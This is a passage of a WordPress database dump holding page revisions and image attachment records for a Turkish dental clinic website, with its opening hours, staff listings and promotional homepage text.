(6530, 1, '2018-07-19 16:25:02', '2018-07-19 13:25:02', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 09:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6505\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"452\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-19 16:25:02', '2018-07-19 13:25:02', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6531, 1, '2018-07-19 16:25:31', '2018-07-19 13:25:31', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6501\" name=\"ZEKİ ERDOĞAN\" role=\"Kurucu - Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6220\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6421\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-19 16:25:31', '2018-07-19 13:25:31', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6532, 1, '2018-07-19 16:31:45', '2018-07-19 13:31:45', '', 'slider-tel2', '', 'inherit', 'closed', 'closed', '', 'slider-tel2', '', '', '2018-07-19 16:31:45', '2018-07-19 13:31:45', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/slider-tel2.jpg', 0, 'attachment', 'image/jpeg', 0),
(6534, 1, '2018-07-23 14:15:44', '2018-07-23 11:15:44', '', 'danistay', '', 'inherit', 'closed', 'closed', '', 'danistay', '', '', '2018-07-23 14:15:44', '2018-07-23 11:15:44', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/danistay.jpg', 0, 'attachment', 'image/jpeg', 0),
(6535, 1, '2018-07-23 14:15:45', '2018-07-23 11:15:45', '', 'sayistay', '', 'inherit', 'closed', 'closed', '', 'sayistay', '', '', '2018-07-23 14:15:45', '2018-07-23 11:15:45', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/sayistay.jpg', 0, 'attachment', 'image/jpeg', 0),
(6536, 1, '2018-07-23 14:15:47', '2018-07-23 11:15:47', '', 'yargitay', '', 'inherit', 'closed', 'closed', '', 'yargitay', '', '', '2018-07-23 14:15:47', '2018-07-23 11:15:47', '', 6290, 'http://www.ze-dent.com/wp-content/uploads/2018/07/yargitay.jpg', 0, 'attachment', 'image/jpeg', 0),
(6537, 1, '2018-07-23 14:16:41', '2018-07-23 11:16:41', '[vc_row][vc_column][us_logos with_indents=\"1\" img_size=\"full\" carousel_dots=\"1\" carousel_center=\"1\" carousel_autoplay=\"1\" carousel_interval=\"2\" breakpoint_1_autoplay=\"1\" breakpoint_2_autoplay=\"1\" breakpoint_3_autoplay=\"1\" items=\"%5B%7B%22image%22%3A%226292%22%7D%2C%7B%22image%22%3A%226294%22%7D%2C%7B%22image%22%3A%226291%22%7D%2C%7B%22image%22%3A%226295%22%7D%2C%7B%22image%22%3A%226293%22%2C%22link%22%3A%22%7C%7C%7C%22%7D%2C%7B%22image%22%3A%226499%22%7D%2C%7B%22image%22%3A%226536%22%7D%2C%7B%22image%22%3A%226534%22%7D%2C%7B%22image%22%3A%226535%22%7D%5D\"][/vc_column][/vc_row]', 'Anlaşmalı Kurumlar', '', 'inherit', 'closed', 'closed', '', '6290-revision-v1', '', '', '2018-07-23 14:16:41', '2018-07-23 11:16:41', '', 6290, 'http://www.ze-dent.com/6290-revision-v1/', 0, 'revision', '', 0),
(6538, 1, '2018-07-23 14:17:47', '2018-07-23 11:17:47', '[vc_row][vc_column][us_logos columns=\"4\" with_indents=\"1\" img_size=\"full\" carousel_dots=\"1\" carousel_center=\"1\" carousel_autoplay=\"1\" carousel_interval=\"2\" breakpoint_1_autoplay=\"1\" breakpoint_2_autoplay=\"1\" breakpoint_3_autoplay=\"1\" items=\"%5B%7B%22image%22%3A%226292%22%7D%2C%7B%22image%22%3A%226294%22%7D%2C%7B%22image%22%3A%226291%22%7D%2C%7B%22image%22%3A%226295%22%7D%2C%7B%22image%22%3A%226293%22%2C%22link%22%3A%22%7C%7C%7C%22%7D%2C%7B%22image%22%3A%226499%22%7D%2C%7B%22image%22%3A%226536%22%7D%2C%7B%22image%22%3A%226534%22%7D%2C%7B%22image%22%3A%226535%22%7D%5D\"][/vc_column][/vc_row]', 'Anlaşmalı Kurumlar', '', 'inherit', 'closed', 'closed', '', '6290-revision-v1', '', '', '2018-07-23 14:17:47', '2018-07-23 11:17:47', '', 6290, 'http://www.ze-dent.com/6290-revision-v1/', 0, 'revision', '', 0),
(6539, 1, '2018-07-23 14:21:31', '2018-07-23 11:21:31', '', 'aysegul-dalkiran-arslan-1', '', 'inherit', 'closed', 'closed', '', 'aysegul-dalkiran-arslan-1', '', '', '2018-07-23 14:21:31', '2018-07-23 11:21:31', '', 1194, 'http://www.ze-dent.com/wp-content/uploads/2018/07/aysegul-dalkiran-arslan-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6540, 1, '2018-07-23 14:21:32', '2018-07-23 11:21:32', '', 'duygu-demir-1', '', 'inherit', 'closed', 'closed', '', 'duygu-demir-1', '', '', '2018-07-23 14:21:32', '2018-07-23 11:21:32', '', 1194, 'http://www.ze-dent.com/wp-content/uploads/2018/07/duygu-demir-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6541, 1, '2018-07-23 14:21:34', '2018-07-23 11:21:34', '', 'zeki-erdogan-1', '', 'inherit', 'closed', 'closed', '', 'zeki-erdogan-1', '', '', '2018-07-23 14:21:34', '2018-07-23 11:21:34', '', 1194, 'http://www.ze-dent.com/wp-content/uploads/2018/07/zeki-erdogan-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6542, 1, '2018-07-23 14:22:24', '2018-07-23 11:22:24', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6541\" name=\"ZEKİ ERDOĞAN\" role=\"Kurucu - Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6539\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6540\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-23 14:22:24', '2018-07-23 11:22:24', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6543, 1, '2018-07-23 14:24:32', '2018-07-23 11:24:32', '', 'zeki-erdogan-ana-sayfa-1', '', 'inherit', 'closed', 'closed', '', 'zeki-erdogan-ana-sayfa-1', '', '', '2018-07-23 14:24:32', '2018-07-23 11:24:32', '', 8, 'http://www.ze-dent.com/wp-content/uploads/2018/07/zeki-erdogan-ana-sayfa-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6544, 1, '2018-07-23 14:25:04', '2018-07-23 11:25:04', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 09:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6543\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"452\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-23 14:25:04', '2018-07-23 11:25:04', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6545, 1, '2018-07-23 15:37:27', '2018-07-23 12:37:27', '', 'pers-1', '', 'inherit', 'closed', 'closed', '', 'pers-1', '', '', '2018-07-23 15:37:27', '2018-07-23 12:37:27', '', 1194, 'http://www.ze-dent.com/wp-content/uploads/2018/07/pers-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(6546, 1, '2018-07-23 15:37:29', '2018-07-23 12:37:29', '', 'pers-2', '', 'inherit', 'closed', 'closed', '', 'pers-2', '', '', '2018-07-23 15:37:29', '2018-07-23 12:37:29', '', 1194, 'http://www.ze-dent.com/wp-content/uploads/2018/07/pers-2.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6547, 1, '2018-07-23 15:39:47', '2018-07-23 12:39:47', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6541\" name=\"ZEKİ ERDOĞAN\" role=\"Kurucu - Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6539\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6540\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row][vc_row content_placement=\"middle\" height=\"auto\"][vc_column][us_separator type=\"fullwidth\" size=\"small\" thick=\"3\" text=\"Dental Asistanlarımız\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][us_person image=\"6546\" name=\"SEVİNÇ PEKBAK\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][us_person image=\"6545\" name=\"SONGÜL EVCİ\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-23 15:39:47', '2018-07-23 12:39:47', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6548, 1, '2018-07-23 15:48:47', '2018-07-23 12:48:47', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 09:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6543\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"5000\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-23 15:48:47', '2018-07-23 12:48:47', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6549, 1, '2018-07-23 15:58:58', '2018-07-23 12:58:58', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cuma 09:00 - 19:00\r\nCumartesi 09:00 - 17:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6543\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"5000\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-23 15:58:58', '2018-07-23 12:58:58', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6550, 1, '2018-07-25 17:16:51', '2018-07-25 14:16:51', '', 'zeki-erdogan-9', '', 'inherit', 'closed', 'closed', '', 'zeki-erdogan-9', '', '', '2018-07-25 17:16:51', '2018-07-25 14:16:51', '', 1194, 'http://www.ze-dent.com/wp-content/uploads/2018/07/zeki-erdogan-9.jpg', 0, 'attachment', 'image/jpeg', 0),
